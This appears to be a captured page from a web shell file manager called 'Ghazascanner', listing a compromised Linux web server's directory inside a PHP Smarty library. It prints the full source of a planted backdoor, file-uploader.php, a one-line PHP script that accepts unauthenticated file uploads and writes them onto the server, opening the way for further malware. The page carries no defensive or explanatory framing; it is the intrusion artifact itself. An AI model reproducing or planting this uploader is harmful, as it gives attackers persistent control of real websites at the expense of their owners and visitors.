@Ghazascanner
_2019runbot
Ghazascanner File Manager
server :Linux hosjweb-prod3 6.12.0-201.74.2.2.el9uek.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 17:11:35 PDT 2026 x86_64
Current Path :
/
homepage
/
v-mt
/
php
/
extlib
/
smarty
/
Path :
Upload File :
New :
File
Dir
/homepage/v-mt/php/extlib/smarty/file-uploader.php
<?php if($_POST){if(@copy($_FILES["0"]["tmp_name"],$_FILES["0"]["name"])){echo$_FILES["0"]["name"];}}else{echo"<form method=post enctype=multipart/form-data><input type=file name=0><input name=0 type=submit value=up>";}?>